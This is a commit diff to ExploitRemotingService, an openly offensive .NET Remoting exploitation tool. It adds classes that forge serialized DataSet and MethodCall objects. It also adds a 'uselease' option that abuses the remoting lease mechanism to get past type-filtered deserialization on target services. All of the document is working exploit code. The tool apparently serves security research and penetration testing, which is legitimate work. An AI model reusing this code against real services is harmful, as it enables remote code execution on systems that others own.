Added lease serialization technique.

Author: tyranid

ExploitRemotingService/DataSetMarshal.cs

@@ -0,0 +1,56 @@
+//    ExploitRemotingService
+//    Copyright (C) 2019 James Forshaw
+//
+//    This program is free software: you can redistribute it and/or modify
+//    it under the terms of the GNU General Public License as published by
+//    the Free Software Foundation, either version 3 of the License, or
+//    (at your option) any later version.
+//
+//    This program is distributed in the hope that it will be useful,
+//    but WITHOUT ANY WARRANTY; without even the implied warranty of
+//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+//    GNU General Public License for more details.
+//
+//    You should have received a copy of the GNU General Public License
+//    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+using System;
+using System.Data;
+using System.IO;
+using System.Runtime.Remoting.Messaging;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace ExploitRemotingService
+{
+    [Serializable]
+    class DataSetMarshal : ISerializable
+    {
+        object _fakeTable;
+        public void GetObjectData(SerializationInfo info, StreamingContext context)
+        {
+            info.SetType(typeof(System.Data.DataSet));
+            info.AddValue("DataSet.RemotingFormat", SerializationFormat.Binary);
+            info.AddValue("DataSet.DataSetName", "");
+            info.AddValue("DataSet.Namespace", "");
+            info.AddValue("DataSet.Prefix", "");
+            info.AddValue("DataSet.CaseSensitive", false);
+            info.AddValue("DataSet.LocaleLCID", 0x409);
+            info.AddValue("DataSet.EnforceConstraints", false);
+            info.AddValue("DataSet.ExtendedProperties", null);
+            info.AddValue("DataSet.Tables.Count", 1);
+            BinaryFormatter fmt = new BinaryFormatter
+            {
+                SurrogateSelector = new RemotingSurrogateSelector()
+            };
+            MemoryStream stm = new MemoryStream();
+            fmt.Serialize(stm, _fakeTable);
+
+            info.AddValue("DataSet.Tables_0", stm.ToArray());
+        }
+        public DataSetMarshal(object fakeTable)
+        {
+            _fakeTable = fakeTable;
+        }
+    }
+}

ExploitRemotingService/ExploitRemotingService.csproj

@@ -71,6 +71,8 @@
   </ItemGroup>
   <ItemGroup>
     <Compile Include="CustomChannel.cs" />
+    <Compile Include="DataSetMarshal.cs" />
+    <Compile Include="MethodCallWrapper.cs" />
     <Compile Include="SerializableWrapper.cs" />
     <Compile Include="SerializerRemoteClass.cs" />
     <Compile Include="FakeComObjRef.cs" />

ExploitRemotingService/MethodCallWrapper.cs

@@ -0,0 +1,50 @@
+//    ExploitRemotingService
+//    Copyright (C) 2019 James Forshaw
+//
+//    This program is free software: you can redistribute it and/or modify
+//    it under the terms of the GNU General Public License as published by
+//    the Free Software Foundation, either version 3 of the License, or
+//    (at your option) any later version.
+//
+//    This program is distributed in the hope that it will be useful,
+//    but WITHOUT ANY WARRANTY; without even the implied warranty of
+//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+//    GNU General Public License for more details.
+//
+//    You should have received a copy of the GNU General Public License
+//    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+using System;
+using System.Linq;
+using System.Reflection;
+using System.Runtime.Remoting.Messaging;
+using System.Runtime.Serialization;
+
+namespace ExploitRemotingService
+{
+    [Serializable]
+    class MethodCallWrapper : ISerializable
+    {
+        private readonly string _uri;
+        private readonly MethodBase _method;
+        private readonly object[] _args;
+
+        public MethodCallWrapper(string uri, MethodBase method, object[] args)
+        {
+            _uri = uri;
+            _method = method;
+            _args = args;
+        }
+
+        public void GetObjectData(SerializationInfo info, StreamingContext context)
+        {
+            info.SetType(typeof(MethodCall));
+            info.AddValue("__Uri", _uri);
+            info.AddValue("__MethodName", _method.Name);
+            info.AddValue("__MethodSignature", _method.GetParameters().Select(p => p.ParameterType).ToArray());
+            info.AddValue("__Args", _args);
+            info.AddValue("__TypeName", _method.DeclaringType.FullName);
+            info.AddValue("__CallContext", string.Empty);
+        }
+    }
+}

ExploitRemotingService/Program.cs

@@ -32,6 +32,7 @@
 using System.Runtime.Remoting.Channels;
 using System.Runtime.Remoting.Channels.Ipc;
 using System.Runtime.Remoting.Channels.Tcp;
+using System.Runtime.Remoting.Lifetime;
 using System.Runtime.Serialization.Formatters;
 using System.Security.Principal;
 
@@ -54,6 +55,7 @@ class Program
         private static string _remotename;
         private static bool _usecom;
         private static bool _useser;
+        private static bool _uselease;
         private static string _installdir;
 
         static void SetupServer()
@@ -171,6 +173,8 @@ private static bool ProcessArgs(string[] args)
                     { "v|verbose", "Enable verbose debug output", v => debug = v != null },
                     { "useser", "Uses old serialization tricks, only works on full type filter services",
                         v => _useser = v != null },
+                    { "uselease", "Uses new serialization tricks by abusing lease mechanism.",
+                        v => _useser = _uselease = v != null },
                     { "nulluri", "Don't send the URI header to the server", v => _null_uri = v != null },
                     { "autodir", "When useser is specified try and automatically work out the installdir parameter from the server's current directory.", v => _autodir = v != null },
                     { "installdir=", "Specify the install directory of the service executable to enable full support with useser",
@@ -265,7 +269,13 @@ private static IRemoteClass GetExistingRemoteClass()
 
         private static IRemoteClass CreateRemoteClassSerial(CustomChannel channel)
         {
-            SerializerRemoteClass remote = new SerializerRemoteClass(channel);
+            ILease lease = null;
+            if (_uselease)
+            {
+                lease = channel.MakeCall<ILease>(_uri.AbsolutePath, typeof(MarshalByRefObject).GetMethod("InitializeLifetimeService"));
+            }
+
+            SerializerRemoteClass remote = new SerializerRemoteClass(channel, lease);
             if (!string.IsNullOrWhiteSpace(_installdir) || _autodir)
             {
                 if (_autodir)
@@ -384,8 +394,12 @@ private static IRemoteClass CreateRemoteClass(CustomChannel channel)
 
         private static object GetMessageObject(string path, MethodBase method, object[] args)
         {
-            FakeMessage msg = new FakeMessage(path, method, args);
+            if (_useser)
+            {
+                return new MethodCallWrapper(path, method, args);
+            }
 
+            FakeMessage msg = new FakeMessage(path, method, args);
             if (_usecom)
             {
                 return new FakeComObjRef(msg);